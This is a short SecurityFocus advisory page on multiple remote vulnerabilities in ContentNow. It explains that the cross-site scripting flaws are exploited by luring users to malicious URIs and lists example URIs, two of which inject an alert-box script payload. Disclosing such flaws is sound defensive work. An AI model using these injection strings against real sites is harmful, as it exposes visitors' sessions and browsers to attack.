Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

ContentNow Multiple Remote Vulnerabilities

An attacker can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, the attacker must entice an unsuspecting user into following a malicious URI.

The following example URIs are available:

http://www.example.com/contentNow/upload.php?path=/contentNow/upload/
http://www.example.com/contentnow/upload/file/language_menu.php/>"><script>alert("XSS")</script>
http://www.example.com/contentnow/upload/file/language_menu.php?pageid=>"><script>alert("XSS")</script>&clang=en







 

Privacy Statement
Copyright 2009, SecurityFocus